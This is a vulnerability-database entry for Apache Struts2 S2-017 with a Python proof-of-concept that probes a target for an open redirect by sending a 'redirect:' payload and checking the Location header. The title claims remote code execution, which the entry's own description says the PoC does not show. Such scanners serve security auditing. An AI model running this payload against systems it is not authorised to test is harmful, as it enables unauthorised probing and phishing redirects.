
Struts2 017远程代码执行

漏洞信息

漏洞编号:JDSEC-POC-20141205-7978

漏洞名称:Struts2 017远程代码执行

提交作者:苏黎世

提交日期:2014-12-05 13:08:32

信息来源:http://struts.apache.org/release/2.3.x/docs/s2-017

漏洞描述

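Struts2 treats request parameters prefixed with "redirect:" or "redirectAction:" as redirect targets without validating them, so a link to a trusted site can send the visitor to an arbitrary external URL (open redirect). Note that the S2-017 advisory cited above describes this open redirect only: the PoC below checks for the redirect and does not demonstrate remote code execution, despite the page title. The remedy is to upgrade to the Struts release that the advisory lists as fixed.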

POC详情

#!/usr/bin/env python
# coding=utf-8

import sys
import requests

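def scan(target):
    """Report whether *target* redirects to the marker URL in the S2-017 probe.

    One GET request is sent to ``target`` with the ``redirect:`` payload
    appended. The redirect is not followed: the verdict is read from the
    target's own response (status code and ``Location`` header), so no request
    is sent to the marker host and the result does not depend on that host
    being reachable.

    Prints one of:
      * ``[!]audit success`` plus the probed URL - the target answered with a
        redirect whose ``Location`` is the marker URL (affected; upgrade
        Struts as described in the S2-017 advisory).
      * ``[!]audit error`` - the target answered normally or redirected
        elsewhere (marker not reflected).
      * ``connection error`` - the request failed or returned another status.

    Args:
        target: Full URL of the action to check, e.g. ``http://host/x.action``.
    """
    info = {
        'name': u'Struts2-017 POC',
        'date': '2014-12-5',
        'author': 'Lenka',
        'poc': '?redirect:http://vul.jdsec.com/',
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    }
    # Marker URL is derived from the payload so the two cannot drift apart.
    marker = info['poc'].split('redirect:', 1)[1]

    try:
        audit_request = requests.get(
            target + info['poc'],
            headers=headers,
            allow_redirects=False,  # judge the target's answer, never visit the marker host
            timeout=10,             # requests has no default timeout and would block forever
        )
    except requests.exceptions.RequestException:
        # DNS failure, refused connection, timeout, malformed URL, ...
        print('connection error')
        return

    status = audit_request.status_code
    location = audit_request.headers.get('Location', '')
    audit_request.close()

    redirected = 300 <= status < 400
    if redirected and location == marker:
        print(u'[!]audit success')
        print('[*]' + target + info['poc'])
    elif redirected or status == 200:
        print(u'[!]audit error')
    else:
        print('connection error')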
			

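if __name__ == '__main__':
    # Command-line entry point: the single argument is the URL of the action
    # to check. Indentation is spaces only (the original mixed tabs and
    # spaces, which Python 3 rejects) and print() is called with one argument
    # so the script runs under both Python 2 and Python 3.
    if len(sys.argv) < 2:
        print("Usage: python struts2_poc_017.py [target]\n")
        print("Example: python struts2_poc_017.py  http://www.xxx.com/xxx.action\n")
        sys.exit(1)
    else:
        target = sys.argv[1]
    scan(target)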